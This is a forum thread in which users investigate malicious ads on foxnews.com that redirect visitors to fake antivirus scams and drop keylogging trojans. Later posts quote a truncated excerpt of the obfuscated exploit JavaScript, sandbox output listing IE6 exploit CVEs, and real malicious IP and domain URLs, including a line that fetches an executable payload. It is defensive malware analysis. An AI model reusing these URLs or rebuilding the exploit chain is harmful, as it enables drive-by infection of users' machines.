CajunTek (Premium Member, Arlington, TX) to buttoni:
Re: foxnews.com infected?

said by buttoni:

So now that you guys have proven something's up with Foxnews.com who's gonna contact Foxnews.com so their tech folks can clean it up?
I did, and I also reported it to stopbadware.org as well...

Hopefully it'll be cleaned up by now.
Cometcom1 (Member, Denmark):
I can confirm there is an infection of the site.

The site is infected through ads and it is these that cause the problem. There can be numerous ads involved, but I have singled out one for sure.

fatness to CajunTek:
said by CajunTek:
said by buttoni:

So now that you guys have proven something's up with Foxnews.com who's gonna contact Foxnews.com so their tech folks can clean it up?
I did, and I also reported it to stopbadware.org as well...

Hopefully it'll be cleaned up by now.
Thank you.

buttoni (Premium Member, Temple, TX) to moonpuppy:
Great, CajunTek. Glad someone took care of that little matter. Thanks.
Cometcom1 (Member, Denmark):

With the deepest respect for dslreports.com. I've got no problems with not telling who I am, or what connection I have with the reporting. - I work with and am connected with stopbadware.org/www.consumerwebwatch.org - through one of their mutual sites. - We're not here to steal your users, but rather to offer our help when need be.

dslreports has always been one of the best resources of the web, and I hope it stays that way.

That said - I'm working to get to the bottom of this, and have identified the possible advertising partner involved. However, I have not received any response from foxnews.com about the issue. I will be investigating this a little more in depth later and give you all a full disclosure of what has been found.

dslreports.com is the cause for the stopbadware community becoming interested in this issue.

Cometcom1

Robotics (Premium Member, Louisa, VA):

I'm sure we all have our fingers crossed this can be corrected/caught in good time.

Thanks for all your help, and nice to meet you.
Cometcom1 (Member, Denmark) to moonpuppy:
I have now managed to obtain a proxy log and a tcp dump of the infection taking place. This should enable us to say what exactly is happening.

I still haven't heard from foxnews.com, if any of you have them on the line, please let them know that I have some of the information required to fix the issue.

Cometcom1

fatness to moonpuppy:
»badwarebusters.org/main/ ··· iew/2772
moonpuppy (banned) (Member, Glen Burnie, MD):

All this fuss over my laptop almost getting infected.

Cometcom1 (Member, Denmark) to moonpuppy:
It seems that the infection emanating from foxnews.com has stopped. I haven't been able to verify any malware from the site today.

If anyone is still experiencing this, please let us know either here at dslreports or through the link fatness provided. (thanks fatness)

I still haven't heard from foxnews but perhaps they can enlighten us later with their response.

Cometcom1

foxinfected (Anon, @bellsouth.net) to moonpuppy:
Still infecting... I was just hit... It's been going on for several days.

Its a Secret (Premium Member, Da wet coast) to Cometcom1:
said by Cometcom1:

I still haven't heard from foxnews but perhaps they can enlighten us later with their response.
I can't imagine Fox will admit any culpability in this. The odds are too great that they'd be sued.

NetFixer (Premium Member, The Boro):

said by Its a Secret:
said by Cometcom1:

I still haven't heard from foxnews but perhaps they can enlighten us later with their response.
I can't imagine Fox will admit any culpability in this. The odds are too great that they'd be sued.
The most that will be said (if anything) is the standard corporate response:
"We did not do it. It is possible that a subcontractor may have done something, but we are not aware of any wrongdoing and we are not responsible for any actions taken by a subcontractor".
Cometcom1 (Member, Denmark) to moonpuppy:
Durn (Excuse my french). I had hoped they'd done something to fix it.

Question: are there any ads that fail to show up for any of you? On my view, I have two ads (denoted by ADVERTISING) on the right vertical bar. Often these are totally blank. If you don't experience these blank spots, then I have a hunch the malware is originating from that location. There's obviously some intelligence involved in the distribution.

Doctor Four (Premium Member, Dallas, TX) to MGD:
I'm not surprised in the least to see DIRECTI's involvement in this. They have been implicated in a huge number of rogue security software scams.

They continually allow the cybercriminals behind these fraudware sites to register new domains, all the while claiming they are taking action against them by shutting down existing ones.
MGD (MVM) to Cometcom1:
said by Cometcom1:

It seems that the infection emanating from foxnews.com has stopped. I haven't been able to verify any malware from the site today.
...
..
Be advised that there is a high probability that the advertiser serving up this malware may be rotating geographic regional ads, either based on the visitor's IP or existing cookies. The exposure may rotate by region depending on the ad criteria, and not everyone will "see" the same rotation. I saw earlier reports from several days prior to my original post listing the infection that pronounced foxnews "clean". I would be hesitant to assume from the absence of the malware over any time period that the issue has been resolved, without some confirmation from the offending advertiser.

I suspect that this is a well organized infection vector that is designed for variable regional exposure, in order to preserve the operation and obfuscate the origin.

While I understand your reluctance to publish your analysis data and identify the advertising source, I am interested in a relevant issue. Have you determined if the source is a direct ad link, or if it appears to be a "legit" ad link compromised by some form of injection?

The reason I ask is that it is already known and verified that some of the criminals pumping this malware are using paid sponsor ads to promote the infection. A previous fake antivirus thread identified a small-time operative and affiliate recruiter residing in Moscow, Russia with the alias "Cactus" who was using paid sponsor ads on Yahoo and others to promote the malware to consumers, in this thread: »[Scam] Real-av.org - Antivirus2009 malware takeover and this specific post: »Re: [Scam] Real-av.org - Antivirus2009 malware takeover

An unacceptable weak link in the internet advertising industry, which has been discussed on numerous occasions in that forum, is the lack of vetting during the submission process. While advertisers may review keywords and relevant links for acceptability, they routinely do not take simple steps to validate the submitter against the form of payment used. I have recorded and documented cyber criminals using stolen card data to successfully open and use Google adsense accounts. The success was dependent on an approval of the charge submitted against the stolen card.

I hope that you will publish the reference data for review even if no response is forthcoming. Even if the data is inconclusive and lacks confirmation from the source, it should be published for others to evaluate.

This vector is not a one time event, neither do I believe that foxnews.com is the only site that is subject to this issue.

Two of the many entities that are responsible for this malware becoming an epidemic are the support services repeatedly obtained from the global financial card processing and banking system, and the services of the internet advertising industry. Neither one, but especially the banking system, is doing reasonable due diligence with respect to this criminal activity.

MGD
Cometcom1 (Member, Denmark):
I concur with your assessment MGD.

I've seen this happen here in my country on a local scale as well. "Our" local infection was hosted in China, but spread out on all Danish news sites.

This community has continued to report this infection even after I thought it was over.

Foxnews is still infected - unfortunately.
grifty (Member) to moonpuppy:
I went to foxnews.com today and the browser shut down automatically. I then got a message saying my computer was infected.

I closed the dialog box and it brought me to a website designed to look like a virus scan was running on my computer. I closed down the browser.

Eset nod32 did not detect anything but it's probably because I did not allow anything to be downloaded to my system.

La Luna (Premium Member, New Port Richey, FL):
said by grifty:

I went to foxnews.com today and the browser shut down automatically. I then got a message saying my computer was infected.

I closed the dialog box and it brought me to a website designed to look like a virus scan was running on my computer. I closed down the browser.

Eset nod32 did not detect anything but it's probably because I did not allow anything to be downloaded to my system.
You might want to run some tools to make sure:

»Re: foxnews.com infected?
caryuser (Member, Cary, IL) to moonpuppy:
Hi,

I have been on foxnews.com twice this weekend, and both times I saw suspicious behavior. One time Firefox blocked access to a site called antimalware-scannerv2.com. However today Firefox did not block access to a site called onlinevirusbusterv2.com. After I started reading an article on foxnews.com for a few seconds, my browser was redirected to a fake av site that "performed" a bogus virus scan on my machine. I fear most people fall for this stuff and end up installing the trojan. At this point, I feel it is unsafe to go to foxnews.com.

EGeezer (Premium Member, Midwest) to moonpuppy:
Seriously, my NoScript and AdBlocker take care of the issues. If I need to allow scripting, I do so only for their home domain. It takes care of the malware issue.

La Luna (Premium Member, New Port Richey, FL):
said by EGeezer:

Seriously, my NoScript and AdBlocker take care of the issues. If I need to allow scripting, I do so only for their home domain.
I was just going to ask that question: do AdBlock and/or NoScript prevent this malware? Are you running both, or just one? I tried both a while back and found them extremely annoying, blocking things that shouldn't be blocked like videos, etc. It was torture trying to weed out the bad stuff from the good to get things working.

I also use a simple Firefox add on called QuickJava that allows me to block both java and java scripting on the fly as I see fit on a site per site basis, although I'm not sure it would work with this issue as there are multiple domains involved, not just the home domain.

EGeezer (Premium Member, Midwest):
said by La Luna:

... Are you running both, or just one? I tried both a while back and found them extremely annoying, blocking things that shouldn't be blocked like videos, etc. It was torture trying to weed out the bad stuff from the good to get things working.
I run both.

I agree, it's a pain until you learn where the media is usually stored. Thanks for the QuickJava mention - I'll have to try that.
MGD (MVM) to Cometcom1:
I can confirm what other recent posters have experienced today. I now categorize foxnews.com as infested. Remember that a user need only visit a page at foxnews.com to trigger the malware popup. It is not the result of clicking on any ad.

While on this page at 16:57 EST »www.foxnews.com/story/0, ··· ,00.html the following was generated:
quote:
19.04.2009 16:57:21 Network Shield: blocked access to malicious site 78.47.132.222/a12/index.php?url=http://truconv.com/?a=125&s=4a12 [ C:\Program Files\Internet Explorer\IEXPLORE.EXE ( 3388 ) ]

Allowing the process to proceed generated this:

Then the page hijacking scan:

A download process of vsm_free_setup.exe also began from toppromooffer.com

While there are many who classify these fake AV programs as "Scareware", I disagree. The first phase of the process will involve charging a victim's card ~$70, followed by numerous other charges in the following days and weeks, but I have yet to see an infected system that did not have subsequent installs of key loggers and back door trojans that turned it into a bot and enabled remote access. That observation is supported by the repeated analysis of these payload installs.

The downloaded file vsm_free_setup.exe was already in VirusTotal's database from a recent submit, and a fresh analysis of this file generated: »www.virustotal.com/anali ··· 95f80e26 However, if you review the related ThreatExpert analysis: »www.threatexpert.com/rep ··· 47a88f8f

Take note of the following excerpts:

------------------------------
Analysis of the file resources indicate the following possible countries of origin:

Russian Federation

Ukraine
------------------------------

Possible Security Risk

Attention! The following threat categories were identified:

•A keylogger program that can capture all user keystrokes (including confidential details such username, password, credit card number, etc.)

•A program that downloads files to the local computer that may represent security risk
------------------------------

It is indeed disingenuous to only classify these as "Scareware"; that undermines the severity of the crime.

The download location also hosts a benign page for the malware:

»toppromooffer.com/vsm/index.html
Snapped 2009-04-19 23:32:14

Many of the same locations as were listed in the earlier post are showing up once again. AS24940 HETZNER is a repeated cesspool for this genre of virus infections:

Added excerpt for emphasis:
quote:
Has this network hosted sites that have distributed malware?

Yes, this network has hosted sites that have distributed malicious software in the past 90 days. We found 85 site(s), including, for example, toppromooffer.com/, bestantimalwarelivescanner.com/, bonuspromooffer.com/, that infected 5596 other site(s), including, for example, portalby.net/, noreastcycling.com/, asiaspa.ie/.

Yes, that is: We found 85 site(s), including, for example, toppromooffer.com that infected 5,596 other site(s

Some more observations to follow.

MGD

Edit= Added text
mysec (Premium Member):
Thanks for the information!

The Fox News link you gave must be fixed - it didn't redirect anywhere; I used your malware links manually.

I get different results, depending on the browser.
said by MGD:

A download process of vsm_free_setup.exe also began from toppromooffer.com

Using Opera, all that happens is the display of a Prompt to Download, which maybe is what you meant:

The victim still has to initiate the download.

BTW - the exploit requires JavaScript to be enabled:

<script language="javascript" src="../../etc/config.js"></script>
<script language="javascript">
//CONFIG.AGRESSION.EX.VAL = 5;
</script>

<SCRIPT src="img/jquery.js" type=text/javascript></SCRIPT>

<SCRIPT src="img/jquery-init.js" type=text/javascript></SCRIPT>

<SCRIPT src="img/flist.js" type=text/javascript></SCRIPT>

<SCRIPT
 

Without these files, nothing happens. To test, I disabled JavaScript in Opera and got a blank page.

Using IE6 with 78.47.132.... that you gave, the browser locked up and then an alert to a remote code execution exploit:

The Page Code has this (excerpt):

<html><body><script language="javascript">try { function MxKrzZOSqYbxzW(IgKhV){
var tOdCnZgx="",beVpC,PTfki,yemjblcpAo,yAFgXcIB,WGmxZNPUc,zItDdLHBVJ,kjqrOKMSP,IdVpm,sANfyVmBOC;
var gWyitpZ="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
var aRzhby="";
for(IdVpm=0;IdVpm<IgKhV.length;){
yAFgXcIB=gWyitpZ.indexOf(IgKhV.charAt(IdVpm++));
WGmxZNPUc=gWyitpZ.indexOf(IgKhV.charAt(IdVpm++));
sANfyVmBOC=MxKrzZOSqYbxzW;
zItDdLHBVJ=gWyitpZ.indexOf(IgKhV.charAt(IdVpm++));
kjqrOKMSP=gWyitpZ.indexOf(IgKhV.charAt(IdVpm++));
beVpC=(yAFgXcIB<<2)+(WGmxZNPUc>>4);
PTfki=((WGmxZNPUc&15)<<4)+(zItDdLHBVJ>>2);


With some help from Wepawet:

Analysis report for index2[1].htm
Detector Result: malicious

Exploits

1. DirectAnimation PathControl: Heap-based buffer overflow in the DirectAnimation Path Control (DirectAnimation.PathControl) COM object (daxctle.ocx) for Internet Explorer 6.0 (CVE-2006-4777)

2. Office Snapshot Viewer: The Microsoft Office Snapshot Viewer ActiveX control allows remote attackers to download arbitrary files to a client machine (CVE-2008-2463)

3. MDAC: Arbitrary file download via the Microsoft Data Access Components (MDAC) (CVE-2006-0003)

4. WebViewFolder: integer overflow via the setSlice method (CVE-2006-3730)

Deobfuscation results
Methods

GetSpecialFolder 2; BuildPath: w32NOFJCyliz5mm5R.exe
GET http://78.47.132.221/a12/aff_12.exe?

Malware
aff_12.exe?u=i_6_0&spl=11: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit

The 3rd exploit (aka MS06-014) is the one I was served up. The clue is:

GetSpecialFolder 2; BuildPath: w32NOFJCyliz5mm5R.exe
 

Special Folder 2 is code for the Temp folder, and in the alert you can see that this file was not found because aff_12 was blocked from downloading and being renamed to w32NOFJCyliz5mm5R.exe.

According to the analysis, all exploits downloaded the same payload.

VirusTotal Result: 2/40
»www.virustotal.com/anali ··· a2f50448

It is rather common today that a malware site determines the browser and serves up exploits accordingly. All of these are IE6 exploits which would have no effect on other browsers.

This is the 3rd exploit I've seen recently where the exact same thing happens: IE6 gets served a batch of exploits looking for an unpatched vulnerability, Opera gets something else.

This shows a level of sophistication and efficiency on the part of the malware community these days.

I recently downloaded Firefox to test sites. This is what occurred with Javascript enabled in Options:

Even clicking "Ignore" would not load the page. It took me a while to find the security setting.

Trying again, I'm served up a PDF exploit. From the code analysis:

Network Activity
Requests
URL:  http://78.47.132.221/a12/pdf.php?u=i_6_0

But it requires the Adobe Acrobat Javascript plugin which I've removed:

Different browser, different exploit. And that might change at any time!

And so it goes...

Edit: added code excerpt


----
rich
Cometcom1 (Member, Denmark) to moonpuppy:
Just to confirm. Still being targeted here as well. Fake antivirus type redirection.

As I expected, there's likely a reinfection timer that checks when an IP was last infected to avoid reinfection for at least 24 hours. My tests seem to indicate that this is not done with cookies.
Sentinel (Premium Member, Florida) to moonpuppy:
I still have no problems on FoxNews.com. I am using Firefox with NoScript and FlashBlock and I use a hosts file to block ads as well.
Cometcom1 (Member, Denmark) to moonpuppy:
Nothing against foxnews - it's their advertising that is acting up and spreading the malware. Likely without them even realizing this is going on.

I've now established contact with foxnews and they are looking into this very seriously.

Cometcom1

MR Opus IT (Anon, @64.80.119.x) to moonpuppy:
I left my home laptop on overnight on Foxnews.com (nothing else open) and my laptop antivirus (Symantec) picked up Bloodhound.Exploit. Also, a user in my office was slammed with 3 different malware issues (she claimed they came from Foxnews) and after I cleaned them all I installed the latest Symantec Endpoint Protection and went back to Foxnews.com and sure enough it picked up 3 different malware trojans. It stopped all three and I then removed any IE7 add-ons and went back to the site and nothing happened. There is something about that site.

fatness to moonpuppy:
Maybe this will provide more of a push for Fox News to deal with this problem: »FoxNews.com Serving Up Infected Ads? [212] comments